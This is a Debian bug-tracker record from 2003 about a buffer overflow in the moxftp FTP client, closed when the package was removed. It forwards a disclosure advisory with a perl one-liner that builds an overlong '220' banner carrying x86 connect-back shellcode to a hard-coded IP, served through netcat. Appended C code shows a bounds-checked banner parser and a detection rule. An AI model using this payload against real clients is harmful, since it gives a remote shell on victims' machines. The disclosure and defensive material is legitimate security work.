Bug#187481: marked as done (moxftp arbitrary code execution poc/advisory)
Your message dated Sun, 11 May 2003 20:40:55 +1000
with message-id <20030511104055.GA28727@regression.cyrius.com>
and subject line Removed
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 3 Apr 2003 18:37:11 +0000
From joey@infodrom.org Thu Apr 03 12:37:11 2003
Return-path: <joey@infodrom.org>
Received: from luonnotar.infodrom.org [195.124.48.78]
by master.debian.org with esmtp (Exim 3.12 1 (Debian))
id 1919aG-0006ZD-00; Thu, 03 Apr 2003 12:37:08 -0600
Received: by luonnotar.infodrom.org (Postfix, from userid 10)
id 17264366B65; Thu, 3 Apr 2003 20:37:07 +0200 (CEST)
Received: at Infodrom Oldenburg (/\##/\ Smail-3.2.0.102 1998-Aug-2 #2)
from infodrom.org by finlandia.Infodrom.North.DE
via smail from stdin
id <m1919XV-000ohcC@finlandia.Infodrom.North.DE>
for submit@bugs.debian.org; Thu, 3 Apr 2003 20:34:17 +0200 (CEST)
Date: Thu, 3 Apr 2003 20:34:17 +0200
From: Martin Schulze <joey@infodrom.org>
To: submit@bugs.debian.org
Subject: moxftp arbitrary code execution poc/advisory
Message-ID: <20030403183417.GA32252@finlandia.infodrom.north.de>
References: <098401c2db77$91e06a70$24029dd9@tuborg>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <098401c2db77$91e06a70$24029dd9@tuborg>
User-Agent: Mutt/1.5.3i
Delivered-To: submit@bugs.debian.org
X-Spam-Status: No, hits=-6.1 required=4.0
tests=HAS_PACKAGE,IN_REP_TO,QUOTED_EMAIL_TEXT,REFERENCES,
SIGNATURE_SHORT_SPARSE,SPAM_PHRASE_00_01,SUPERLONG_LINE,
USER_AGENT,USER_AGENT_MUTT
version=2.44
X-Spam-Level:
Package: moxftp
Version: 2.2-18
Severity: grave
Tags: security
Unfortunately I am currently unable to discover the real problem
behind this potential exploit. I'm not even sure if it works
on Linux.
FreeBSD people simply marked this package FORBIDDEN, but didn't
fix the problem either. *sigh*
Regards,
Joey
Knud Erik Højgaard wrote:
> Attached document explains all.
>
> This document is also available from http://kokanins.homepage.dk
>
> --
> Knud
> I. BACKGROUND
>
> According to the vendor moxftp is a "Ftp shell under X Window System".
> /usr/ports/ftp/moxftp
>
> II. DESCRIPTION
>
> Insufficient bounds checking leads to execution of arbitrary code.
>
> III. ANALYSIS
>
> Upon parsing the '220 welcome to server' ftp banner a buffer can be
> overrun, allowing us to execute our arbitrary code. The buffer may be
> constructed as such: [508 bytes][ebp ][eip ][nops][shellcode]. Placing
> the nops and shellcode in the buffer before ebp seems to cause some
> problems, luckily there's plenty of space after eip.
>
> Example run:
>
> $ perl -e 'print "220 " . "\x90" x 508 . "\x48\xfa\xbf\xbf" x 2 . "\x90" x 100 . "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9\x9d\x02\x24\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80" .. "\n"' > file
> # nc -l -p 21 < file
>
> This sets up a rogue server which will overflow the buffer, and execute
> the shellcode. The shellcode is connect-back to 217.157.2.36 port 10000,
> replace "\xd9\x9d\x02\x24" with a suitable ip for testing.
>
> IV. DETECTION
>
> moxftp-2.2 shipping with the FreeBSD ports system as well as from
> various webpages per 9/2-03 is vulnerable.
>
> V. WORKAROUND
>
> unknown
>
> VI. VENDOR FIX
>
> unknown
>
> VII. CVE INFORMATION
>
> unknown
>
> VIII. DISCLOSURE TIMELINE
>
> unknown
>
> IX. CREDIT
>
> Knud Erik Højgaard
>
--
Life is too short to run proprietary software. -- Bdale Garbee
Please always Cc to me when replying to me on the lists.
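The advisory above says only that the client overruns a buffer while parsing the server's "220" greeting. The following is an added illustration written for this page, not moxftp's code and not part of either bug report: a bounds-checked reply-line reader of the kind a fixed client would need. The buffer size BANNER_MAX, the status codes and the function names are assumptions chosen for the example; the 512-byte figure is only suggested by the 508-byte overflow distance the advisory quotes. The reader refuses lines that do not fit instead of truncating silently, and also rejects bytes outside printable ASCII, since RFC 959 replies are text and a greeting carrying raw machine code is something a defender wants logged rather than parsed.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical fixed-size reply buffer for this example; the advisory's
 * 508-byte overflow distance hints at a buffer of roughly this size. */
#define BANNER_MAX 512

enum banner_status {
    BANNER_OK = 0,        /* line fit and a 3-digit reply code was parsed */
    BANNER_TOO_LONG = 1,  /* first line would not fit; nothing was copied */
    BANNER_BAD_CODE = 2,  /* line fit but does not start with a 3-digit code */
    BANNER_NONPRINT = 3   /* line carries bytes outside printable ASCII */
};

/* Length of the first line of raw, up to but not including '\n' (or end of data). */
static size_t first_line_len(const char *raw, size_t raw_len)
{
    size_t n = 0;
    while (n < raw_len && raw[n] != '\n')
        n++;
    return n;
}

/* Bounds-checked parse of one FTP reply line into out[out_len].
 * Refuses overlong lines before touching the buffer, rejects non-text
 * content (NOP sleds and shellcode are not printable ASCII), strips CR,
 * and stores the reply code in *code on success. */
enum banner_status parse_ftp_banner(const char *raw, size_t raw_len,
                                    char *out, size_t out_len, int *code)
{
    size_t n = first_line_len(raw, raw_len);
    size_t i;

    if (out_len == 0 || n >= out_len)
        return BANNER_TOO_LONG;          /* need room for the terminating NUL */

    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)raw[i];
        if (c != '\r' && (c < 0x20 || c > 0x7e))
            return BANNER_NONPRINT;
    }

    memcpy(out, raw, n);
    out[n] = '\0';
    if (n > 0 && out[n - 1] == '\r')     /* drop the CR of a CRLF ending */
        out[n - 1] = '\0';

    if (n < 3 || !isdigit((unsigned char)out[0]) ||
        !isdigit((unsigned char)out[1]) || !isdigit((unsigned char)out[2]))
        return BANNER_BAD_CODE;

    *code = (out[0] - '0') * 100 + (out[1] - '0') * 10 + (out[2] - '0');
    return BANNER_OK;
}

/* Run the parser against raw bytes using a stack buffer of BANNER_MAX. */
enum banner_status check_banner(const char *raw, size_t raw_len, int *code)
{
    char buf[BANNER_MAX];
    *code = -1;
    return parse_ftp_banner(raw, raw_len, buf, sizeof buf, code);
}

/* Constructed overlong greeting: a valid code followed by 700 filler bytes,
 * the general shape the advisory describes (far more than 508 bytes). */
static char overlong[4 + 700 + 1];

const char *make_overlong_banner(size_t *len)
{
    memset(overlong, 'A', sizeof overlong);
    memcpy(overlong, "220 ", 4);
    overlong[sizeof overlong - 1] = '\n';
    *len = sizeof overlong;
    return overlong;
}

int main(void)
{
    const char good[] = "220 welcome to server\r\n";      /* constructed normal greeting */
    const char binary[] = "220 \x90\x90\x90\r\n";          /* constructed: NOP bytes in banner */
    size_t len;
    const char *bad = make_overlong_banner(&len);
    int code;

    printf("good:     status %d code %d\n", check_banner(good, sizeof good - 1, &code), code);
    printf("overlong: status %d\n", check_banner(bad, len, &code));
    printf("binary:   status %d\n", check_banner(binary, sizeof binary - 1, &code));
    return 0;
}
```

The same length and printable-text checks work as a passive detection rule on captured traffic: a "220" reply whose first line exceeds a few hundred bytes, or contains bytes outside 0x20..0x7e, is worth an alert regardless of which client is on the other end.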
---------------------------------------
Received: (at 187481-done) by bugs.debian.org; 11 May 2003 10:41:40 +0000
From tbm@cyrius.com Sun May 11 05:41:23 2003
Return-path: <tbm@cyrius.com>
Received: from bangpath.uucico.de [195.71.9.197]
by master.debian.org with esmtp (Exim 3.12 1 (Debian))
id 19EoGh-0005NM-00; Sun, 11 May 2003 05:41:23 -0500
Received: by bangpath.uucico.de (Postfix, from userid 10)
id D9D5926BC4; Sun, 11 May 2003 12:41:21 +0200 (CEST)
Received: by regression.cyrius.com (Postfix, from userid 1000)
id 4881323D48; Sun, 11 May 2003 20:40:55 +1000 (EST)
Date: Sun, 11 May 2003 20:40:55 +1000
From: Martin Michlmayr <tbm@cyrius.com>
To: 187481-done@bugs.debian.org
Subject: Removed
Message-ID: <20030511104055.GA28727@regression.cyrius.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
Delivered-To: 187481-done@bugs.debian.org
X-Spam-Status: No, hits=-7.3 required=4.0
tests=BAYES_01,USER_AGENT_MUTT
version=2.53-bugs.debian.org_2003_05_09
X-Spam-Level:
X-Spam-Checker-Version: SpamAssassin 2.53-bugs.debian.org_2003_05_09 (1.174.2.15-2003-03-30-exp)
This package has been removed from Debian unstable because it has been
orphaned for a very long time and nobody adopted it. See
http://lists.debian.org/debian-devel-announce/2003/debian-devel-announce-200304/msg00005.html
for more information.
--
Martin Michlmayr
tbm@cyrius.com